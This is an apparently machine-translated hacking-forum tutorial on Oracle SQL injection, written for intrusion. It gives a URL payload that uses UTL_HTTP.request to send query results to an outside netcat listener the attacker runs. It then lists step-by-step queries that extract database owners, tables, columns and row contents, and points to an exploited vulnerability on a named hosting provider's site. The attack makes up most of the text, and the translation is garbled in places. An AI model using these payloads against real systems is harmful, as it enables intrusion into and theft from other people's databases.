Author: Kindle
MSN: Kindle@live.cn
Blog: http://hi.baidu.com/system_exp
Team: Security Team (http://bbs.exploits.com.cn)
First, the Internet nc listens to the corresponding port
The url statement is as follows:
Http://www.exploits.com.cn/Kindle? Jsp = 1 and UTL_HTTP.request (Internet ip: port/| (SQL statement) = 1 --
The content is as follows:
And UTL_HTTP.request (Internet ip: port/| (SQL statement) = 1 --
Database explosion:
Select owner from all_tables where rownum = 1
Select owner from all_tables where owner <> first database name and rownum = 1
Select owner from all_tables where owner <> first database name and owner <> second and rownum = 1
Select owner from all_tables where owner <> first database name and rownum = 1
On this basis
Burst table:
Select TABLE_NAME from all_tables where owner = Database Name and rownum = 1
Select TABLE_NAME from all_tables where owner = Database Name and rownum = 1 and TABLE_NAME <> table name 1
Select TABLE_NAME from all_tables where owner = Database Name and rownum = 1 and TABLE_NAME <> table name 1 and TABLE_NAME <> table name 2
On this basis
Burst columns:
Select COLUMN_NAME from user_tab_columns where table_name = table name and rownum = 1
Select COLUMN_NAME from user_tab_columns where table_name = table name and rownum = 1 and COLUMN_NAME <> first column name popped up
Select COLUMN_NAME from user_tab_columns where table_name = table name and rownum = 1 and COLUMN_NAME <> first column name and COLUMN_NAME <> second column name
Burst content:
First content: select column name from table name where rownum = 1
Second content: select column name from table name where rownum = 1 and column name <> first value
Third content: select column name from table name where rownum = 1 and column name <> first value and column name <> second value
On this basis
Now we turn around to look at the "hichina embarrassing-web ORACLE injection vulnerability exposure" http://bbs.exploits.com.cn/read.php? Tid-144.html
Is it clear that... o (∩ _ ∩) o... haha
Note:
1: In windows, oracle is started as a service, so that the system permission can be directly obtained through web injection (this part of content is being sorted and tested, to provide more intuitive, concise, and effective reference materials
2: Oracle will also be analyzed for unix and linux operating systems. I believe Oracle injection will become a bridge for advanced Hack intrusion.
3. This is a series of articles to be updated later